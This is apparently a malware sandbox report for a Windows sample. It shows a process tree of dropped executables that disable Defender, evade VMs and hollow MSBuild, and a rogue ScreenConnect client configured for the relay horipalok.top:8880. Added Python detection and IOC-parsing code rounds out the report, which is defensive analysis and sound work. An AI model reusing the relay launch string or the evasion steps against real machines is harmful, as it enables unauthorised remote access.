C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2484 -prefsLen 27135 -prefMapHandle 2488 -prefMapSize 270279 -ipcHandle 2492 -initialChannelId {0edaf4aa-32dd-4133-a68f-cb28823a2b41} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵
PID:3484
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3800 -prefsLen 25164 -prefMapHandle 3804 -prefMapSize 270279 -jsInitHandle 3808 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3816 -initialChannelId {d937caec-12fa-46a1-952c-fba0ed7d56a6} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:5228
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3992 -prefsLen 27276 -prefMapHandle 3996 -prefMapSize 270279 -ipcHandle 3840 -initialChannelId {d0bf5d4b-a78f-4023-8de5-88e0c03e3dc6} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵
PID:5260
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1664 -prefsLen 34775 -prefMapHandle 3204 -prefMapSize 270279 -jsInitHandle 3000 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4388 -initialChannelId {2b5cf9b2-337d-4a01-bb3f-07d80437f100} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:5704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5280 -prefsLen 35012 -prefMapHandle 5284 -prefMapSize 270279 -ipcHandle 5292 -initialChannelId {69ac1d29-b11f-4df5-a3ec-356fe05751e6} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:6780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5468 -prefsLen 32900 -prefMapHandle 5472 -prefMapSize 270279 -jsInitHandle 5476 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5480 -initialChannelId {3fbfe4f9-6e6b-409d-8b1a-8b3280107bc5} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:6852
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5752 -prefsLen 32900 -prefMapHandle 5756 -prefMapSize 270279 -jsInitHandle 5760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5732 -initialChannelId {37f995a0-e386-4daf-8b5c-7632dc9e5f35} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:6952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5776 -prefsLen 32900 -prefMapHandle 5780 -prefMapSize 270279 -jsInitHandle 5784 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5724 -initialChannelId {65e5415e-47fa-4e18-990b-d2ba9a55e9ab} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:6960
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381480101\ae9ab2f9a7.exe (tree depth 6, PID 5460)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381480101\ae9ab2f9a7.exe"
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\10381490101\0af0a2f978.exe (tree depth 6, PID 6660)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381490101\0af0a2f978.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\10381500101\389dc2db95.exe (tree depth 6, PID 5824)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381500101\389dc2db95.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe (tree depth 6, PID 2532)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\svchost015.exe (tree depth 7, PID 4008)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\10381520101\1310185143.exe (tree depth 6, PID 6288)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381520101\1310185143.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\svchost015.exe (tree depth 7, PID 7012)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381520101\1310185143.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\10381530101\842890bd89.exe (tree depth 6, PID 7088)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381530101\842890bd89.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (tree depth 7, PID 6928)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (tree depth 7, PID 6040)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (tree depth 7, PID 6032)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (tree depth 7, PID 6892)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\10381540101\88e128475c.exe (tree depth 6, PID 5460)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381540101\88e128475c.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery

C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe (tree depth 6, PID 6736)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\msiexec.exe (tree depth 7, PID 7076)
Command line: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow

C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe (tree depth 6, PID 7060)
Command line: "C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (tree depth 7, PID 4340)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
- System Location Discovery: System Language Discovery

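Three things in the dropped-payload block above are worth turning into detections: a child process whose image (svchost015.exe) does not match the executable named in its own command line (the parent's SetThreadContext signature is the hollowing step), Temp-resident droppers spawning MSBuild.exe with no project file, and msiexec installing a ScreenConnect MSI out of the user's Temp directory. The Python below is an added example written for this page, not sandbox code and not part of the report; the process records are constructed from the tree above (parent links are inferred from nesting depth, since the report does not print parent PIDs), and the last record is an invented benign control so the rules have something not to fire on.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    parent_pid: Optional[int]
    image: str      # executable actually mapped (the path the sandbox lists first)
    cmdline: str    # command line as reported


# Constructed from the tree above. Parent links are inferred from nesting depth;
# the final record is an invented benign control (an MSI installed from a share).
PROCS = [
    Proc(2532, None, r"C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe"'),
    Proc(4008, 2532, r"C:\Users\Admin\AppData\Local\Temp\svchost015.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\10381510101\e2a57b0b34.exe"'),
    Proc(7088, None, r"C:\Users\Admin\AppData\Local\Temp\10381530101\842890bd89.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\10381530101\842890bd89.exe"'),
    Proc(6928, 7088, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'),
    Proc(6736, None, r"C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"'),
    Proc(7076, 6736, r"C:\Windows\SysWOW64\msiexec.exe",
         r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"'),
    Proc(9001, 9000, r"C:\Windows\System32\msiexec.exe",
         r'"C:\Windows\System32\msiexec.exe" /i "\\fileserver\software\7zip.msi"'),
]

_TOKEN = re.compile(r'"[^"]*"|\S+')


def _tokens(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].casefold()


def _under_user_temp(path: str) -> bool:
    return "\\appdata\\local\\temp\\" in path.casefold()


def image_cmdline_mismatch(p: Proc) -> bool:
    """argv[0] names a different executable than the mapped image. That is what a
    hollowed process looks like: the loader starts one binary suspended, replaces
    its memory and resumes it (SetThreadContext) with the original command line.
    Comparing basenames keeps System32/SysWOW64 redirection from firing."""
    toks = _tokens(p.cmdline)
    return bool(toks) and _basename(toks[0]) != _basename(p.image)


def bare_msbuild_from_temp(p: Proc, parent: Optional[Proc]) -> bool:
    """MSBuild.exe with no project argument, launched by something in %TEMP%."""
    if parent is None or _basename(p.image) != "msbuild.exe":
        return False
    return len(_tokens(p.cmdline)) == 1 and _under_user_temp(parent.image)


def msiexec_package_from_temp(p: Proc) -> bool:
    """msiexec /i whose package sits in the user's Temp directory."""
    if _basename(p.image) != "msiexec.exe":
        return False
    toks = _tokens(p.cmdline)
    for flag, arg in zip(toks, toks[1:]):
        if flag.casefold() == "/i" and arg.casefold().endswith(".msi"):
            return _under_user_temp(arg)
    return False


def run_detections(procs: List[Proc]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs, sorted, for every record a rule matches."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.parent_pid) if p.parent_pid is not None else None
        if image_cmdline_mismatch(p):
            hits.append(("image_cmdline_mismatch", p.pid))
        if bare_msbuild_from_temp(p, parent):
            hits.append(("bare_msbuild_from_temp", p.pid))
        if msiexec_package_from_temp(p):
            hits.append(("msiexec_package_from_temp", p.pid))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid in run_detections(PROCS):
        print(f"{rule}: PID {pid}")
```

On the records above this yields one hit per rule: PID 4008 (svchost015.exe carrying e2a57b0b34.exe's command line), PID 6928 (bare MSBuild.exe under 842890bd89.exe) and PID 7076 (the ScreenConnect MSI from Temp); the share-installed control is silent. The same three checks port directly to Sysmon Event ID 1 fields (Image, CommandLine, ParentImage).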
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe (tree depth 1, PID 1040)
Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\msiexec.exe (tree depth 1, PID 1788)
Command line: C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\syswow64\MsiExec.exe (tree depth 2, PID 4840)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 50AFF144DCF597C4779DCE41C282C693 C
- Loads dropped DLL
- System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\rundll32.exe (tree depth 3, PID 4568)
Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI608A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240673015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
- Loads dropped DLL
- System Location Discovery: System Language Discovery

C:\Windows\system32\srtasks.exe (tree depth 2, PID 5040)
Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe (tree depth 2, PID 4320)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 78160B2577CA7B06F6A076D2A0D88BC7
- Loads dropped DLL
- System Location Discovery: System Language Discovery

C:\Windows\syswow64\MsiExec.exe (tree depth 2, PID 4128)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding C9B507D3301384497EB43BE89FC601C3 E Global\MSI0000
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery

C:\Windows\syswow64\MsiExec.exe (tree depth 2, PID 5988)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding D01E534E3464E31F12EA82ADE440F0E1 C
- Loads dropped DLL
- System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\rundll32.exe (tree depth 3, PID 3220)
Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIAA30.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240757343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
- Loads dropped DLL
- System Location Discovery: System Language Discovery

C:\Windows\syswow64\MsiExec.exe (tree depth 2, PID 4976)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding C73A214114A08B1AAD62F8C8BAD04C4D
- Loads dropped DLL
- System Location Discovery: System Language Discovery

C:\Windows\system32\vssvc.exe (tree depth 1, PID 2016)
Command line: C:\Windows\system32\vssvc.exe
- Checks SCSI registry key(s)

C:\Windows\system32\cmd.exe (tree depth 1, PID 5060)
Command line: C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"

C:\Windows\system32\rundll32.exe (tree depth 2, PID 4268)
Command line: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"

C:\Windows\system32\svchost.exe (tree depth 1, PID 4056)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc

C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe (tree depth 1, PID 4384)
Command line: "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=d1968bf2-fc89-4cfc-baae-f9f7dd88acf1&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses

C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe (tree depth 2, PID 4728)
Command line: "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "a93597c2-d849-4cd8-99c3-a02dc415fecd" "User"
- Executes dropped EXE

C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe (tree depth 2, PID 4196)
Command line: "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "aebcedaf-40f3-432a-ad45-a92ed3244d11" "System"
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS

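The ScreenConnect.ClientService.exe entry above carries the client's complete launch string: the relay host and port (h=horipalok.top, p=8880), the session GUID (s=) and a k= value whose BgIAAACkAABSU0Ex prefix is a CryptoAPI PUBLICKEYBLOB (a BLOBHEADER with algorithm id CALG_RSA_KEYX, then an RSAPUBKEY header with the RSA1 magic, bit length and public exponent, then the little-endian modulus). ScreenConnect itself is legitimate software, so the useful IOCs are the relay the client was built for and the key blob it trusts. The Python below is an added example for this page, not code from the report or from ScreenConnect: it parses the launch string into responder-ready fields and decodes the blob header. The launch string is copied verbatim from the entry above; the approved-relay allowlist used in the usage is an assumption.

```python
import base64
import hashlib
import struct
from typing import Dict, Iterable
from urllib.parse import parse_qs

# Constructed input: the argument string of ScreenConnect.ClientService.exe as it
# appears in the process tree of this report, verbatim (still URL-encoded).
LAUNCH = (
    "?e=Access&y=Guest&h=horipalok.top&p=8880&s=d1968bf2-fc89-4cfc-baae-f9f7dd88acf1"
    "&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O"
    "%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr"
    "%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb"
    "%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b"
    "&t=30march"
)

PUBLICKEYBLOB = 0x06          # BLOBHEADER.bType for a public key (wincrypt.h)
CALG_RSA_KEYX = 0x0000A400    # BLOBHEADER.aiKeyAlg: RSA key-exchange key


def decode_rsa_publickeyblob(b64: str) -> Dict[str, object]:
    """Decode a CryptoAPI PUBLICKEYBLOB: BLOBHEADER (8 bytes) + RSAPUBKEY (12 bytes:
    'RSA1', bitlen, pubexp) + modulus, all little-endian. Padding is restored in case
    the '=' characters were stripped from the launch string."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    b_type, b_version, _reserved, alg = struct.unpack_from("<BBHI", raw, 0)
    magic = raw[8:12]
    if b_type != PUBLICKEYBLOB or magic != b"RSA1":
        raise ValueError("not an RSA PUBLICKEYBLOB")
    bits, pub_exp = struct.unpack_from("<II", raw, 12)
    modulus_le = raw[20:20 + bits // 8]
    return {
        "alg": alg,
        "version": b_version,
        "bits": bits,
        "e": pub_exp,
        "modulus": int.from_bytes(modulus_le, "little"),
        "complete": len(modulus_le) == bits // 8,   # False if the blob was truncated
        "blob_sha256": hashlib.sha256(raw).hexdigest(),  # stable fingerprint for the relay key
    }


def parse_launch_string(arg: str) -> Dict[str, object]:
    """Split the client launch string into the fields a responder needs."""
    qs = parse_qs(arg.lstrip("?"), strict_parsing=True)
    field = lambda key: qs[key][0]          # parse_qs already URL-decodes %2f / %2b
    return {
        "mode": field("e"),
        "relay_host": field("h"),
        "relay_port": int(field("p")),
        "session_id": field("s"),
        "tag": field("t"),
        "key": decode_rsa_publickeyblob(field("k")),
    }


def is_unapproved_relay(info: Dict[str, object], approved_hosts: Iterable[str]) -> bool:
    """The relay host is the signal: a client built for a relay the organisation
    does not operate is an attacker's remote-access foothold, whatever the vendor."""
    approved = {h.casefold() for h in approved_hosts}
    return str(info["relay_host"]).casefold() not in approved


if __name__ == "__main__":
    info = parse_launch_string(LAUNCH)
    key = info["key"]
    print(f"relay {info['relay_host']}:{info['relay_port']} session {info['session_id']}")
    print(f"RSA-{key['bits']} e={key['e']} blob sha256 {key['blob_sha256']}")
    # "support.example.com" is an assumed allowlist entry, not from the report.
    print("unapproved relay:", is_unapproved_relay(info, ["support.example.com"]))
```

For this sample the blob decodes to a complete 2048-bit RSA key with e=65537, and the relay horipalok.top:8880 is the value to block and hunt for in service ImagePath entries and proxy logs. The blob SHA-256 is a convenient second indicator, since an attacker can re-point a relay hostname but keeps the same server key.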
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe (tree depth 1, PID 4912)
Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe (tree depth 1, PID 3368)
Command line: C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
- Executes dropped EXE

C:\Windows\system32\cmd.exe (tree depth 1, PID 3032)
Command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\smss.exe

C:\Users\Admin\AppData\Local\Temp\smss.exe (tree depth 2, PID 3968)
Command line: C:\Users\Admin\AppData\Local\Temp\smss.exe
- Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe (tree depth 1, PID 6140)
Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe (tree depth 1, PID 3268)
Command line: C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
- Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\smss.exe (tree depth 1, PID 4700)
Command line: C:\Users\Admin\AppData\Local\Temp\smss.exe
- Executes dropped EXE

MITRE ATT&CK Enterprise v15
(numbers in parentheses are the matched-signature counts shown in the matrix)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
- System Services (2): Service Execution (2)
Persistence
- Boot or Logon Autostart Execution (3): Authentication Package (1), Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (7): Windows Service (7)
- Event Triggered Execution (1): Component Object Model Hijacking (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (3): Authentication Package (1), Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (7): Windows Service (7)
- Event Triggered Execution (1): Component Object Model Hijacking (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Impair Defenses (6): Disable or Modify Tools (5)
- Modify Registry (8)
- Virtualization/Sandbox Evasion (2)
Downloads
-
Filesize: 214KB
MD5: 7a98f07d1e25dfd01a23eb1e7caa604f
SHA1: b733a2ea732a969284d29861eacb89dd31d57174
SHA256: 22a9324d5cc8716298810a0f0c286809c41b81f4189ee9277185aff0380c28fc
SHA512: a5cef997093b499c0e0470062231e314742e2be671c48acd94dce9f24fab5f04257fd1303176e45f32684402432a52177aebd857bd35499c837656b77e1e575a
-
Filesize: 3KB
MD5: a95edb1ee54e9dae0e30b618269a33b2
SHA1: 903893c7ea52b9c8c336c9d5db0e0dcb3b8df8cd
SHA256: 4ded9aeb2e3d9661afbf1641a06b68a4fba501f284f0016b3e2cef0d8be2daf1
SHA512: 9f76706b3a4e0e51ed7324a71d7f27479a4278ac18c127eca5200de4aa3c54132102d46e56017ffa9fc9d1bed743ee84d2b1f5e34186d405096134c96181513c
-
Filesize: 67KB
MD5: ffedbac44fe3af839d5ae3c759806b2c
SHA1: 71e48c88dfffe49c1c155181e760611c65f6ca50
SHA256: 42e0add27d20e2393f9793197798ac7d374812a6dcd290b153f879a201e546af
SHA512: 533d9284c15c2b0bf4b135fc7e55a04139d83065282fd4af54866b8b2b6966a0989d4ecf116b89a9b82d028ef446986aa1b92bb07b1521b1aef15ba286b75358
-
Filesize: 93KB
MD5: d3e628c507dc331bab3de1178088c978
SHA1: 723d51af347d333f89a6213714ef6540520a55c9
SHA256: ea1cfad9596a150beb04e81f84fa68f1af8905847503773570c901167be8bf39
SHA512: 4b456466d1b60cda91a2aab7cb26bb0a63aaa4879522cb5d00414e54f6d2d8d71668b9e34dff1575cc5b4c92c61b9989abbe4b56a3e7869a41efcc45d23ca966
-
Filesize: 3KB
MD5: 9322751577f16a9db8c25f7d7edd7d9f
SHA1: dc74ad5a42634655bcba909db1e2765f7cddfb3d
SHA256: f1a3457e307d721ef5b63fdb0d5e13790968276862ef043fb62cce43204606df
SHA512: bb0c662285d7b95b7faa05e9cc8675b81b33e6f77b0c50f97c9bc69d30fb71e72a7eaf0afc71af0c646e35b9eadd1e504a35d5d25847a29fd6d557f7abd903ab
-
Filesize: 949B
MD5: db17015125764bfad7a8f6825371f5b9
SHA1: 53dec7f8515cfe36c4dfbbd9e78880497c96d716
SHA256: bf9a4f97ef23b29abfadfed96522a6988075a4a4bde3cb39fedbb81a376dddba
SHA512: 3494f80ca3c1bd89a046f07468265d43baaeb953a72b2830e502ecf041b3aac45474bc1b8699ede0172f8bd98ace224376b796534352eb21e86bad0d4f0a98c3
-
Filesize: 1.2MB
MD5: fd0cf8534c82ffa6d4e80f35630103e2
SHA1: 53ae82af29d589a833c3bff9330c61c6cd745f91
SHA256: ed4f0559dbcf2191cb9f9f79c116a880d1618e96c86922d86659d738a615a476
SHA512: 2bf99566a00264b9cb60cb8b684667ce1703a92d014f47bb54b347f85bdc423b2a9f81ce69c7de5cb148d4ba7f46d9b0846005b3312c2eb9e4f7baee7b070b3c
-
Filesize: 2KB
MD5: 25604a2821749d30ca35877a7669dff9
SHA1: 49c624275363c7b6768452db6868f8100aa967be
SHA256: 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512: 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize: 1B
MD5: cfcd208495d565ef66e7dff9f98764da
SHA1: b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
